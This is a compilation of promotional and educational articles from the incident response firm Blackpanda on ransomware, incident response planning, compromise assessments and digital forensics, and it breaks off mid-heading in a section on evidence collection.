Ransomware attacks have been on the rise, with the Asia Pacific region alone experiencing a 168% increase in ransomware incidents in 2021 compared to the previous year. Not only are ransomware attacks becoming more common, but they are targeting organizations across all sectors and sizes, especially Small-Medium Enterprises (SMEs) and startups.
In Singapore alone, The Cyber Security Agency received 61 reports of ransomware attacks, almost double the figure for the whole of 2019 (The Straits Times, 2020). The increased incidence of ransomware attacks can be linked to the emergence of ‘Ransomware-as-a-Service’ (RaaS); a business model designed by cyber criminal organisations which lease ransomware variants to their clients in exchange for a percentage of the ransom paid by the victim. This way, people with little to no technical knowledge are able to launch sophisticated ransomware attacks on organizations.
With the average ransom demand averaging USD 180,000, hackers are always on the lookout for digital open doors. It is crucial for organizations of all sizes to be informed of the cyber risks they face and build resilience.
No one can ever be safe from ransomware. As a type of malware that is primarily initiated by human error and which can cause large damages within seconds, no Operating System (OS)—whether it be Mac, Windows 10, or Linux—has ransomware protection. Even traditional Endpoint Detection and Response (EDR) and anti-virus can do very little to prevent ransomware, as these work by searching for known malware. Given ransomware’s rapid development and its constantly evolving strains, EDR and anti-virus simply cannot keep up. Behavior-based threat hunting is the best solution to catch early signs of compromise.
Unlike what is thought by many, you cannot simply delete ransomware, and only expert incident responders can have a chance of independently decrypting data or mitigating the damages brought about by ransomware.
"With rapid growth across Asia-Pacific markets, ransomware-related acts are increasingly normalizing in the region as attackers follow the money trail"
Who are the targets of ransomware attacks?
In the past, ransomware attackers targeted individuals. However, cybercriminals have more recently turned to businesses for larger payouts, affecting more endpoints and to detrimental effect.
Attackers target organizations holding sensitive data which can (and often do) pay quickly to retrieve their data and avoid irreparable damage or embarrassment. Such firms include financial institutions, medical facilities, and government agencies.
Hackers know that these industries require consistent and reliable access to their data and face serious repercussions if Personally Identifiable Information (PII) of their patients, clients, or contractors are eliminated or released.
Western markets like the United States, Canada and the United Kingdom remain the top three targets for ransomware attacks geographically. However, with rapid growth across Asia-Pacific markets (such as Hong Kong, Singapore, and ASEAN economies) ransomware-related acts are increasingly normalizing in the region as attackers follow the money trail.
How to stay protected from ransomware?
A commitment to cyber hygiene is critical to protecting organizations and users from cyber threats. Malware protection begins with the basics, as follows:
Update your software and operating system regularly. Outdated applications are at higher risk of compromise and are often the target of attacks.
Configure firewalls to block access to malicious IP addresses.
Do not click on links or open attachments from people who are outside your network or organisations unless they are completely trustworthy. If in doubt, confirm with the sender that they intended to send communication through a new reply email or phone call.
Backup your devices to an external hard drive on a regular basis and disconnect the hard drive from your computer following backups – backups are also targeted by attackers.
Follow safe practices when browsing the internet. Do not visit pages with uncommon URLs or sites that are not trusted.
Enable strong email spam filters to prevent phishing attempts from reaching end users.
Be wary of attachments that require you to enable macros to view files. Macro malware can infect multiple files.
Authenticate inbound emails to prevent email spoofing.
Apply application whitelisting to monitor the applications allowed to run on your network.
Avoid revealing any personal or financial information over email or over the phone. Important transactions should occur face to face where possible.
More technical solutions include engaging a ransomware incident response firm to perform a routine risk analysis on your networks and servers to identify potential points of compromise. Compromise Assessments offer a holistic option, as they help single out bugs and vulnerabilities in the network, identify opportunities for improvement, and produce information about whether the company is already under attack. They also aid Incident Response efforts—if required—by helping reduce dwell time and enabling prompt activation of response plans and processes.
For professional assistance with any of the above services, please schedule a call with a Blackpanda incident response expert here.
Handling cyber security incidents can be stressful, especially with uncertainty regarding cause, remediation, and the extent of the impact. However, firms are often required to respond to an attack immediately with whatever information is available, or they run the risk of greater loss. This stress intensifies when firms do not know what to do or whom to call, leaving them seemingly helpless and more susceptible to loss.
To better prepare for cyber emergencies, firms should invest in a team of incident responders who are equipped with technical skills to act quickly and reliably. The incident response team is responsible for mitigating the effects of an incident in a timely and organized manner, including analyzing the intrusion, containing the impact, investigating the root cause, and remediating the issue.
Structures and forms
Depending on the needs and priorities of an organization, the incident response team can take on varying structures, including both internal and external parties. The scope of responsibilities may also differ depending on the nature of an incident. For instance, an organization can set up its own dedicated Security Operations Center (SOC), an internal division consisting of IT and security personnel taking care of continuous monitoring and handling incidents. A company can also have an external partner committed to activating as needed to provide incident triaging services or an advanced level of digital forensics and crisis management expertise.
In order to ensure coverage and availability, many organizations, especially large global ones, choose to have their incident response teams located in multiple regions such as North America, Europe, and APAC with an active incident response team available whenever a security incident is discovered. Having worked in a few companies with such global incident response team set-up, I found the strength of local presence highly valuable.
However, teams operating across large distances and multiple time zones must employ proper communication and collaboration efforts. Information sharing and transparency with established standard operating procedures for incident collaboration and handover are extremely important for the multi-regional incident response team to be effective. For organizations without global presence, incident response teams may work in shifts to achieve 24/7 coverage as needed. Otherwise, partnering or contracting with locally-based, specialized incident response firms like Blackpanda is often more cost-effective.
Roles and responsibilities
As the structure and form vary, an incident response team may comprise multiple different roles. Below is a list of key members for an effective incident response team and their responsibilities. Depending on the nature of a cyber incident, additional or fewer roles may be required.
Senior/Executive Management, who will effectively lead and oversee all activities, making or approving critical decisions and directives;
Incident Manager, who will manage and coordinate the overall incident response process, identify necessary tasks and assign them properly, ensuring important information and evidence are properly retrieved, documented, analyzed, reported, and escalated to the appropriate channels when necessary;
Department Leads, who will lead respective functional support as required, including timely dissemination of communications, media relations, regulatory compliance, HR and employee coordination (especially if an internal employee is discovered to be part of the incident), legal representation and guidance on any liability issues that may ensue;
Technical Lead/Recovery Manager, who will work closely with the Incident Manager, usually in leading the investigation on-site and focus on the technical tasks, particularly the initial scoping of compromised assets in the identification phase;
Security Analysts and Researchers, who will work closely with the Technical Lead to investigate the cyber incident, focusing on identifying the scope, containing the damage, analyzing the root cause, assisting in recovery, and documenting all details into an incident report; they may also conduct continuous monitoring and gather threat intelligence.
Regardless of the role a member plays in the incident response team, it is essential for everyone to be actively involved in the ‘Incident Response Preparation’ and ‘Lessons Learned’ phases to ensure the team understands the organization policies, communication plan, tools, and resources available.
Additionally, key members of the team are recommended to have auxiliaries or deputies such that the entire incident response team always functions seamlessly and effectively when any members are unavailable.
Skills and experience
Varying levels of skill and experience are often required for different cyber incidents. Particular skills an incident response team may include digital forensics capabilities, malware analysis, and reverse engineering, data analysis, as well as soft skills such as effective communication, collaboration, and documentation.
To build an effective incident response team, relevant training on the required skill sets is essential. Table-top exercises and red team attack simulations are great ways to identify any gaps or critical skills missing for potential team training. Frequent training also keeps the team up to date on the latest risk and security trends, bracing them well to fight new threat actors and attack strategies.
In addition, arming the team with the right set of tools will also enhance the performance and capabilities. Likewise, it is highly recommended to provide specific training on available tools with hands-on practice to ensure the team fully understands how best to use them. With a structure suitable for your organization, the proper roles established, and the professional skills and tools training in place, an effective incident response team can be built.
For professional consultative support in establishing such a team or response strategy, Blackpanda offers IR consulting services tailored to your individual business requirements. If you’re already a Blackpanda Cyber Crisis Member, you also qualify to receive Member-exclusive rates for these services. Please feel free to reach out to us to discuss the most efficient and effective steps toward achieving your incident response and preparedness goals today.
Compromise Assessments are an unrivaled method of evaluating an organization’s cyber security posture. By verifying whether there are active threats existing within the network and eradicating them before they can cause damage, this service acts preemptively to identify and eradicate potential cyber incidents before they can occur. In Blackpanda’s experience, 91% of companies conducting their first Compromise Assessment have discovered active threats residing in their networks.
Cyber attackers often work undetected in a network for months or years, often entering through “legitimate” paths, setting off no alarms and leaving no trace of forced entry. Like a sniper, attackers lie in wait, gathering or exfiltrating confidential intel and building a profile of your business while looking for the perfect time to strike.
Compromise Assessments seek to find attackers who are currently positioned in an environment or that have been active in the recent past. The assessment process is akin to the steps that Blackpanda incident responders would take in the event of a breach; ivia an inside–out investigation and security audit of the organization’s internal environment, applications, infrastructures, and endpoints.
Compromise assessments for compliance
Compromise Assessments not only reduce the chances of your organization being hit by a devastating cyber attack. They can also assure clients that their data is being appropriately protected, and investors that their money is in safe hands. In fact, one of the biggest hidden costs of cyber breaches is reputational damage, as clients and partners may feel that the breached organisation is not trustworthy enough to adequately protect itself from cyber threats.
Additionally, in many countries around the world, conducting a Compromise Assessment is a legal requirement for certain industries including financial institutions, and is highly recommended for others.
For example, Singapore’s MAS TRM guidelines for financial institutions dedicate an entire section to threat hunting and incident response (2.2 Cyber Event Monitoring and Detection and 12.3 Cyber Incident Response and Management). MAS TRM directives in Singapore include strengthening system security and resiliency while deploying strong authentication processes to protect sensitive data. This can be achieved by implementing required security patches and conducting regular Compromise Assessments to address cyber vulnerabilities. We advise you to check with your local regulations on cyber security requirements for detailed information on cyber security requirements for your organization.
Do small businesses need compromise assessments?
Cyber attacks are becoming more common. They are targeting organizations across all sectors and sizes, and small-medium enterprises (SMEs) and start-ups are getting hit especially hard. Research by insurance firm, Chubb, found that 93% of SMEs that experienced a cyber incident reported a severe impact to their business. For these reasons, start-ups and SMEs must develop their cyber security measures. Building their security will assist SMEs in maintaining confidence in the Asian and global markets while surviving in an ever-changing cyber-threat panorama.
Whilst a strong digital infrastructure and good cyber hygiene can protect organizations from up to 90% of cyber risks, they are not sufficient. Attackers are continuously working to find loopholes in the system, and a singular instance of negligence can severely compromise the cyber security of the company. Blackpanda’s cyber Compromise Assessment services for small businesses can help your organization improve its cyber security posture.
How often should you perform a compromise assessment?
Global financial institutions have internal teams, just like Blackpanda’s, conducting Compromise Assessments on a daily basis, as their risk tolerance for being unaware of an active breach is essentially nil. For smaller companies which can assume a higher risk tolerance, compromise assessments can be conducted weekly, monthly, or even quarterly -- the decision regarding frequency is ultimately a financial cost-benefit analysis for each business.
Blackpanda recommends a minimum of quarterly Compromise Assessments for Asian businesses due to the average regional dwell time of 90 days, also known as the amount of time it takes for a victim to detect an active intrusion. Conducting Compromise Assessments on a quarterly basis helps victims to preempt an active breach instead of stumbling on it accidentally in a normal dwell time scenario. A compromise assessment results in a reduction of the damage otherwise to be inflicted.
Third-party Compromise Assessments are the gold standard, as they are objective and impartial, while limiting the possibility of an insider threat during the course of the operation.
Blackpanda’s experts are able to dig deeper than what is expected day-to-day in real-time monitoring. Additionally, the assessment brings tools and techniques like Digital Forensic Analysis and Behavior Analytics that are typically reserved for incident response. Investigators are better suited for detecting post-compromise activity. Compromise Assessments are an extremely effective defensive and in-depth measure an organization can use to discover any threats that may have made it past the first lines of defense.
— —
Compromise Assessments are a key cyber security service, and every company should conduct a cyber compromise assessment at least once per quarter. This ensures that all active or potential threats in your network are addressed as soon as possible, minimizing attack dwell time and in turn reducing the chances that your organization is hit by a catastrophic cyber attack of the likes of the ones we have witnessed this year worldwide.
Blackpanda is Asia’s premier Digital Forensics and Incident Response provider. Our threat hunting specialists conduct bespoke Compromise Assessments for our APAC based clients on a daily basis. Blackpanda services are available ad hoc for urgent requests, or alternatively at a discounted rate for those who wish to purchase retained hours.
If you are interested in conducting a Compromise Assessment, contact Blackpanda via the contact form or directly at hello@blackpanda.com.
Compromise assessments seek to find attackers who are currently in the environment or that have been active in the recent past, in a similar way to what an incident response firm would do in the event of a breach: it is an inside–out investigation and security audit of the organisation’s internal environment, applications, infrastructures, and endpoints.
Compromise assessments look at the system from the inside, searching for malware that has attempted to or successfully compromised the network to provide insights on which vulnerabilities are being exploited. Results are based on suspicious user behaviours, extensive log review, Indicators of Compromise (IOCs), and any other evidence of malicious activity (past or present) to identify attackers residing in the current environment.
A compromise assessment is composed of 4 key steps:
Onboarding and Network Normalisation—After assessing an organisation’s security posture, we deploy EDR to gather security logs and data for two weeks. This creates a baseline of behaviour, gives us a detailed view of the endpoint’s network traffic and security events and prepares the environment for advanced threat hunting queries.
Active Threat Hunting — Our Level 3 Threat Hunting specialists conduct extensive log investigations using a proprietary list of over 120+ advanced threat hunting queries, updated weekly to reflect the most recent threat intelligence.
Threat Reporting and Containment — Once our threat hunters have meticulously looked through all computer logs, a report is produced detailing findings and delineating a path to action based on the state of the system.
Continued Support — Experts personally pore through logs to create a holistic picture of the network. This way, we can support an organisation’s cyber defences beyond the Threat Hunting exercise, flagging activities that are damaging to the organisation’s security. Along the way, we gain a deep understanding of an organisation’s security posture and its specific needs, tailoring our ongoing services to fit its custom requirement set by its industry, regional landscape, and the latest trends in cyber attacks.
Learn more about how Blackpanda conducts compromise assessments here.
Who needs a compromise assessment?
Global financial institutions have internal teams, just like Blackpanda’s, conducting compromise assessments on a daily basis, as their risk tolerance for being unaware of an active breach is essentially nil.
For smaller companies which can assume a higher risk tolerance, compromise assessments can be conducted weekly, monthly, or even quarterly -- the decision regarding frequency is ultimately a financial cost-benefit analysis for each business.
Whilst a strong digital infrastructure and good cyber hygiene can protect organisations from up to 90% of cyber risks, they are not sufficient. Attackers are continuously working to find loopholes in the system, and a singular instance of negligence can severely compromise the cyber security of the company. Blackpanda’s cyber security compromise assessment services for small businesses can help your organisation improve its cyber security posture. Learn more about who needs a compromise assessment here.
What is the Difference Between Penetration Testing and Compromise Assessments?
Vulnerability Assessment and Penetration Testing (VAPT), also known as “red teaming”, is a preventive measure to gain awareness of the organisation’s cyber weaknesses, so they can be patched before an attack takes place.
Whilst VAPT can be useful in determining what may go wrong, if an attacker is currently compromising the system, there is no way of detecting this through VAPT alone. Limiting the dwell time of an attack is the single best thing that can be done to limit its damages and improve the chances of eradicating it and successfully restoring system health.
Given the speed at which attacks can spread from one infected endpoint to all network endpoints, early detection of an incident can make the difference between a business surviving an attack and having to shut down due to extensive damages.
Compromise Assessments fulfil the same due diligence requirements as VAPTs, but look at the system from the inside, searching for malware that has attempted to or has successfully compromised the network and providing insights on what vulnerabilities are being exploited.
Compromise assessments thus offer a real-time view of the company’s security posture, and offer the opportunity to promptly respond to any attack before it gets out of hand. By adopting the same inside-out strategy as incident response, compromise assessments are both a preventive and a proactive tool to safeguard and improve an organisation’s cyber security.
Once an attack has been identified in a compromise assessment, the company can immediately initiate the process of containing and eradicating the incident. This is key in safeguarding the organisation’s cyber health and even its overall survival, as the dwell time of a cyber attack is the most important factor determining the severity of the compromise. The longer an attack dwells in the network, the more damage the attackers can do and the higher the chances that the organisation will not be able to recover from the breach.
Learn more about the key differences between VAPT and compromise assessments here.
— —
Regular compromise assessments are crucial to protect a company’s cyber security. An independent compromise assessment can uncover compromises that may have gone undetected, thereby providing the evidence needed to justify additional security investments.
To request information about a Blackpanda compromise assessment on your network, contact us.
Would you know if you were breached? Cyber attackers often work undetected in a network for months or even years. They frequently enter through “legitimate” paths, setting off no alarms and leaving no trace of forced entry. Like a sniper, attackers lie in wait, gathering or exfiltrating confidential intel and building a profile of your business while looking for the perfect time to strike. Reducing the dwell time of an attack is the most crucial element to limiting the damage it can cause.
Compromise assessments seek to find attackers who are currently in the environment or that have been active in the recent past, in a similar way to what an incident response firm would do in the event of a breach: it is an inside–out investigation and security audit of the organization’s internal environment, applications, infrastructures, and endpoints.
Compromise assessments look at the system from the inside, searching for malware that has attempted to or successfully compromised the network to provide insights on which vulnerabilities are being exploited. Results are based on suspicious user behaviors, extensive log review, Indicators of Compromise (IOCs), and any other evidence of malicious activity (past or present) to identify attackers residing in the current environment.
Regular compromise assessments are also a regulatory requirement in many countries.
But how do compromise assessments work? Here is a rundown of the key steps that Blackpanda’s Level 3 Threat Hunting specialists carry out on client systems when conducting a compromise assessment.
Step 1: Onboarding and network normalization
While Security Information and Event Management (SIEM), Endpoint Detection and Response (EDR) and other automated security solutions seek known malware and common malicious behaviors, new malware variants or attacks carried out by seemingly legitimate actors are often undetected. At Blackpanda our specialists perform a thorough investigation of our client’s systems to identify IOCs), hacker Tactics, Techniques, and Procedures (TTPs), and threats such as Advanced Persistent Threats (APTs) evading your existing security system.
After assessing an organization’s security posture, we deploy SentinelOne’s next-generation Singularity platform to gather security logs and data for two weeks. This creates a baseline of behavior, gives us a detailed view of the endpoint’s network traffic and security events and prepares the environment for advanced threat hunting queries.
Step 2: Active threat hunting
Our Level 3 Threat Hunting specialists conduct extensive log investigations using a proprietary list of over 120+ advanced threat hunting queries, updated weekly to reflect the most recent threat intelligence.
These hyper-customized queries are designed to uncover suspicious and malicious activities, including behavioral searches meant to identify highly-sophisticated and previously unknown (known for 0-days) strains of malware.
Sample queries used by Blackpanda include:
T1081: Suspicious access to credentials
T1083: Detected directory enumeration
T1497: A hook was placed in the mouse
T1503: Sensitive data was decrypted
Our bespoke Threat Hunting guarantees a clear picture of all ongoing, potential and past breaches in the system at the time of conducting the analysis.
"Our Level 3 threat hunting specialists conduct extensive log investigations using a proprietary list of over 120+ advanced threat hunting queries, updated weekly to reflect the most recent threat intelligence"
Step 3: Threat reporting and containment
Once our threat hunters have meticulously looked through all computer logs, a report is produced detailing findings and delineating a path to action based on the state of the system.
Typical findings include attacks in their early stages, such as an account password brute force attempt before it’s been breached. We also detect ongoing or past attacks with the identification of known malware and the presence of known-bad behaviors (network beaconing, IOCs, powershell scripting). Our Incident Response (IR) specialists can then proceed to containing a live incident and restoring the organization’s security baseline.
Ultimately, the goal of the assessment is to rapidly identify critical vulnerabilities, adversary activity, or malicious logic. Once the assessment is complete, Blackpanda makes recommendations regarding the proper response and offers to preserve collected evidence for the organization to allow them to conduct a formal forensic investigation into the root cause and attribution of the attack.
Step 4: Continued support
Unlike AI-led, automated threat hunting, our compromise assessment services are human-driven. Experts personally pore through logs to create a holistic picture of the network. This way, we can support an organization’s cyber defences beyond the Threat Hunting exercise, flagging activities that are damaging to the organization’s security. Along the way, we gain a deep understanding of an organization’s security posture and its specific needs, tailoring our ongoing services to fit its custom requirement set by its industry, regional landscape, and the latest trends in cyber attacks.
How often should your business conduct a compromise assessment?
Global financial institutions have internal teams, just like Blackpanda’s, conducting compromise assessments on a daily basis, as their risk tolerance for being unaware of an active breach is essentially nil. For smaller companies which can assume a higher risk tolerance, compromise assessments can be conducted weekly, monthly, or even quarterly -- the decision regarding frequency is ultimately a financial cost-benefit analysis for each business.
Blackpanda recommends a minimum of quarterly compromise assessments in Asia due to the average dwell time of 90 days, or the amount of time it takes for a victim to detect an active intrusion. Conducting compromise assessments on a quarterly basis helps victims to preempt an active breach instead of stumbling on it accidentally in a normal dwell time scenario. A Compromise Assessment results in a reduction of the damage otherwise to be inflicted.
Third-party compromise assessments are the gold standard, as they are objective and impartial, while limiting the possibility of insider threat during the course of the operation.
Blackpanda’s experts are able to dig deeper than what is expected day-to-day in real-time monitoring. Additionally, the assessment brings tools and techniques like Digital Forensic Analysis and Behavior Analytics that are typically reserved for incident response. Investigators are better suited for detecting post-compromise activity. Compromise assessments are an extremely effective defense in depth measure an organization can use to ensure any threats that made it past their defenses.
--
An independent compromise assessment can uncover compromises that may have gone undetected, thereby providing the evidence needed to justify additional security investments.
Many organizations do not have adequate investment levels for cyber security or do not have the time or resources to implement all the necessary cyber controls. A regular compromise assessment should thus be incorporated into your risk mitigation strategy to ensure your environment is not compromised by attacks that are more sophisticated than what your organization can detect with your current means.
Compromise assessments not only reduce attack dwell time by disrupting and eradicating hidden attackers before they can act, but also root out attackers who steal or abuse legitimate access credentials and show due diligence by assuring investors, regulators, and other stakeholders of your security.
Whether you suspect a breach or are looking for peace of mind, Blackpanda threat hunting specialists assist with the detection and identification of attackers already in your network. Uncover hidden threats and prioritize a plan of action you can follow or remediation. Would you know if you were breached? To get ahead of an attack, contact Blackpanda to conduct a compromise assessment on your network.
Cyberattacks have significantly increased over the years and are now more complex than ever. In order to safeguard your business from vulnerabilities, it is important to ensure that you have a cyber incident response plan in place that can be activated in times of crisis—especially when your reputation, revenue, and customer relationships are on the line.
Much like fire drills, incident response is a business process that should be actively and regularly practiced such that it becomes second nature even during high-pressure situations.
An incident response plan must be put in place to guide in mitigating attacks and recovery. This plan must follow the SANS Institute and NIST prescribed processes for a methodical and more organized approach.
However, it must be noted that not all cybersecurity incidents are similar in nature and importance. While some may require rigid investigations due to the complexity of the attack and the size of the damage, others might simply be login failures or isolated cases.
That said, your company must keep a list of possible event and incident types with specifics on when each event needs a thorough investigation. You will then have to modify your incident response processes accordingly.
How do you make a cyber incident response plan?
Before elaborating on each step of the Incident Response Process, please observe the phases developed by SANS Institute and NIST that must be considered in conducting incident response:
SANS institute:
Preparation
Identification
Containment
Eradication
Recovery
Lessons Learned
NIST:
Preparation
Detection and Analysis
Containment, Eradication, and Recovery
Post-Incident Activity
From the get-go, both SANS Institute and NIST clearly have similar elements and order. The only difference is that NIST has grouped some elements into a single step. Nevertheless, both programs provide guidance on key considerations for building an effective incident response plan which we have outlined below.
Preparation
'Preparation' not only better arms the IR efforts in case of a future incident but it will also greatly reduce the risk that a response will be required in the first place.
This stage is critical, and much effort should be put to ensure the organization is as prepared as possible.
Some (non-exhaustive) questions to consider:
What elements comprise your security infrastructure?
Do you need experts in Media, Legal, HR, or IT Systems?
Do you have reporting obligations to external authorities? If so, who will liaise with them and when?
Do you have adequate internal skills or do you need trusted partners to assist?
Are you capable of capturing evidence for use in potential criminal or civil proceedings?
Prioritize your assets. This includes listing not just your critical assets but even your systems, networks, servers, and applications. Assess their value and rank them based on importance. Then, observe the traffic patterns for these assets. Determine the norm and be aware of any discrepancies.
Set up appropriate policies and standards to follow in different situations such as network access, login guidelines, use of strong passwords, file sharing, as well as email and other platform access.
Strategize on how to manage the different types of cases and incidents. Rank each possible event base on priority, severity, and organizational impact. Provide notes on each event, specifying how it can be solved, what steps to take to remediate it, and what tools to use, if any.
Set up a communication plan among all stakeholders involved. Assign responsibilities among individual contact persons, what form of communication to use, when they should be contacted and during which kinds of incidents. Do not forget to include and collaborate with the Legal, HR, and Procurement teams (including external partners) to move forward with requests much more quickly and efficiently.
Properly document all events and provide updates. Include information about checklists, questions to be answered in case of emergencies, instructions, and other important information. Conduct regular cyber hygiene checks and updates.
Provide access control, tools, and training. You must give specific access to the company’s network and systems to your incident response team in order for them to conduct all necessary actions to mitigate the crisis. Likewise, proper cyber incident response tools and training must be available to them to ensure that they are well-equipped to fix issues that will be discovered during the incident.
"An organization's network will host literally millions of 'events' ... The trick is to be able to identify the events that are unauthorized or have an adverse impact on your systems and business"
Identification (or detection and analysis)
An organization's network will host literally millions of events. These include system log-ons, software updates, network connections established. Over 99.9% of these events are usually normal behavior for your environment.
The trick is to be able to identify the event or events that are unauthorized or have an adverse impact on your systems and business. These are called 'incidents', and incidents must be investigated.
In order to prevent incidents from happening, three basics steps are essential. Firstly, regular and strict monitoring must be observed. This will help in detecting and reporting any anomalies or potential security risks. Monitoring security events include constant review of log files, error messages, intrusion detection systems and firewalls.
At the onset of an attack, identifying the root cause of the breach is the main objective. Gather all necessary details about the incident. Find out who, what, when, where, and how it happened. Check from different entry points and indicators including user accounts, system administrators, network administrators, the SIEM, and logs.
Alert and report the incident to the proper authority by submitting an incident ticket. Classify the incident based on the provided incident types. Analyze and record the extent of the event, especially its damage to the systems—if any.
Containment
While this is the step in the incident response handling process where SANS Institute and NIST differ the most, the essential focus in both is to contain damage, eradicate all threats and restore systems back online.
Part of containing the damage is to ensure that the incident will not escalate further. This includes isolating the infected accounts, servers, or networks to the rest of the environment; backing up files and systems; and temporarily repairing any damaged material. Aside from these, it is important to keep all evidence safe from destruction.
Note that managing containment can be tricky as many stakeholders may be affected and certain efforts may even tip off the attackers that you are aware of their efforts. As such, decision-makers need to be informed and empowered to make critical choices at this stage. Consideration must be given to balancing the risk of continuing normal operations with the actions required to mitigate the threat.
Eradication
Following Identification and Containment, there should be enough information to determine the root cause of the incident and how to best disrupt the attacker and remove them from your environment. The priority is to neutralize and remove all threats, including malicious activities and contents. Consider conducting a complete reimaging of the system’s hard drive to safeguard from subsequent attacks.
Recovery
Any affected systems or platforms will need to be restored to proper working order following an incident. Examine any connected or related systems to ensure they are operating as normal with no signs of compromise.
Security professionals must coordinate these efforts with the business and operations teams to minimize disruption and maximize efficiency. Lastly, recovery requires establishing more sophisticated monitoring and detection techniques for combating future threats.
The final step in the incident handling process involves the assessment of the entire incident, from how it was prepared for, managed, and addressed. At Blackpanda, we support our clients at this stage through our cyber incident response reports. While many firms regrettably skip this process, it is absolutely essential to recognize your victories and failures during the entire process, as this provides you with a great cyber incident response case study that is directly applicable to your business, informing your future incident response planning.
Systematic reflection highlights areas for improvement for the future, along with those that should be kept up. This final step serves as training, from which you are able to use to update your current incident response plan and the list of incidents you have already encountered.
What did the organization and stakeholders learn from this incident? Could the incident have been prevented? Was it handled correctly? Do we have the right people and resources to detect and manage such incidents in the future?
Prepare briefings for the board, shareholders, and reporting agencies where required, and always remember: security is ultimately a human problem – can we better train our employees in any way?
Putting It All Together
Cyber attacks have become a certainty in the lifetime of a business, and preparation is the only way that organizations can build adequate resilience to the evolving cyber threats.
An effective incident response plan is one that is grounded in the NIST and SANS frameworks. Key steps of pre-breach and post-breach cyber security include preparation, identification, containment, eradication and recovery, as well as post-breach learning.
As Asia’s premier Digital Forensics and Incident Response provider, Blackpanda supports your organization in building an incident response plan that it tailored to your specific business and industry, being hyper-focused on tackling threats in the Asian landscape. Contact us to learn more about our incident response planning services or to report a breach.
Incident Response (IR) is the systematic approach to managing a cyber security incident. Like firefighters to a burning building, we help identify the source of danger, the scope of damage, and strategise an approach to contain and exterminate the threat.
Often, an incident response strategy also includes aspects of crisis management, digital forensic investigation, and legal or public relations support (as needed). The ultimate goal of incident response is to limit damage and identify the root cause of the incident to better manage future risks. Effective incident response allows you to remediate a situation faster, protecting sensitive data, your company’s reputation, and revenue streams.
What is Digital Forensics?
Digital forensics is the process of uncovering and interpreting electronic data from digital devices. Data collected from these devices help identify and preserve evidentiary materials in an organisation’s digital infrastructure, and can be very important in an investigation relating to a cyber attack.
Digital forensics practices include:
File System Forensics—whereby file systems within the endpoint are analyzed for signs of compromise
Memory Forensics—whereby the computer memory is analyzed for attack indicators that may not appear within the file system
Network Forensics—whereby network activity—including emailing, messaging and web browsing—is reviewed to identify an attack, understand the cyber criminal’s attack techniques and gauge the scope of the incident
Log Analysis—whereby activity records or logs are reviewed and interpreted to identify suspicious activity or anomalous events
On top of this, analysis from the digital forensics team can help shape and strengthen preventative security measures, such as with compromise assessments. This can enable the organisation to reduce overall risk, as well as speed future response times. Digital forensics enables Blackpanda specialists to piece through the aftermath of an attack in order to better understand how the breach happened in the first place.
Ransomware Incident Response
Ransomware attacks have been on the rise, with the Asia Pacific region alone experiencing a 168% increase in ransomware incidents in 2021 compared to the previous year.. Not only are ransomware attacks becoming more common, but they are targeting organisations across all sectors and sizes, from large multinationals to Small-Medium Enterprises (SMEs) and startups. In this article, we look at how your company can protect itself from ransomware and what to do in the event that you experience an attack.
Falling victim to ransomware can be a stressful and emotional time, and an experienced IR company such as Blackpanda provides invaluable help in containing the attack, eradicating the malware, and restoring business as usual, all whilst managing PR, negotiating with the attackers, and ensuring safety and legality throughout.
Incident Response Regulations
On January 18th, 2021, the Monetary Authority of Singapore (MAS) released its latest revision to The Notice on Technology Risk Management (TRM). Key to this update are the requirements to investigate and report certain cyber incidents to the MAS.
The TRM applies to financial institutions (FIs) in Singapore. FIs include (but are not limited to) all banks, licensed financial advisers, licensed insurers, registered insurance brokers, and recognized market operators incorporated in Singapore.
With Incident Response and Reporting now mandatory for compliance with MAS guidelines, Blackpanda produced an advisory covering reporting requirements and the capabilities needed to support an investigation.
How to Create an Incident Response Plan?
Much like fire drills, incident response is a business process that should be actively and regularly practised such that it becomes second nature even during high-pressure situations.
An incident response plan must be put in place to guide in mitigating attacks and recovery. This plan must follow the SANS Institute and NIST prescribed processes for a methodical and more organised approach. However, it must be noted that not all cybersecurity incidents are similar in nature and importance. While some may require rigid investigations due to the complexity of the attack and the size of the damage, others might simply be login failures or isolated cases.
That said, your company must keep a list of possible event and incident types with specifics on when each event needs a thorough investigation. You will then have to modify your incident response processes accordingly. Follow this guide to understand the key steps to building an effective incident response plan.
How Do You Build an Effective Incident Response Team?
Handling cyber security incidents can be stressful, especially with uncertainty regarding cause, remediation, and the extent of the impact. However, firms are often required to respond to an attack immediately with whatever information is available, or they run the risk of greater loss. This stress intensifies when firms do not know what to do or whom to call, leaving them seemingly helpless and more susceptible to loss.
To better prepare for cyber emergencies, firms should invest in a team of incident responders who are equipped with technical skills to act quickly and reliably. The incident response team is responsible for mitigating the effects of an incident in a timely and organized manner, including analyzing the intrusion, containing the impact, investigating the root cause, and remediating the issue.
Is Incident Response a Good Career Option?
Cyber security companies report that skilled talent is hard to find, and offer good pay and learning opportunities to those who have the relevant competencies and predisposition to grow into these roles.
Working in cyber security exposes you to a fast paced and rapidly developing environment. As the cyber threat landscape is constantly evolving, staying up to date on the latest cyber threats and malicious actors is crucial to success with new roles being born as cyber threats and cyber regulations develop. In Asia, a Cyber Security Analyst can expect a salary between USD$ 22,000 and USD$77,000 a year
– –
Blackpanda is Asia's premier Digital Forensics and Incident Response firm specialising in Digital Forensics and Incident Response.
To schedule an exploratory call with one of our experts or if you are experiencing a breach contact us here. For more information, contact us to schedule an exploratory call with one of our experts here.
With the rising number of cybercrimes, tracking nefarious actors online has become a crucial focal point for both governments and private enterprises alike. When cybercrime takes place within your own digital environment, identifying the extent of the compromise and investigating the root cause should be your top priority in order to contain the damage, eradicate the threat, and mitigate further loss.
Digital forensics is the process of uncovering and interpreting electronic data from digital devices. It is often in relation to cybercrime and assists in pinpointing the origin of an attack, tracing it back to the source and enabling the recovery of lost or stolen data. Typically, an investigation involving digital forensics would include the following five critical steps:
1. Identification
Knowing where to look for electronic evidence is extremely important when beginning an investigation. Sources of relevant evidence may include (but are not limited to) mobile phones, computers, servers, emails, and internet service providers. The process of identification may not only be digital; observation of physical surroundings (e.g., security camera positions, key card access control readers, etc.) may also provide physical evidence in putting together a timeline.
2. Containment
Containment serves as the first active response to a crisis, disabling the hacker from carrying out malicious activity to prevent further damage. The nature of the incident will determine the type of containment effort taken, ranging from controlling, monitoring, and enabling added security measures.
Upon identification, system or network isolation might be necessary in order to reduce damages and prevent further disruption to business operations. To decide whether or not the system requires isolation, consider critical factors such as the extent to which the system, platform, or application is deployed within the company network.
3. Collection & Preservation
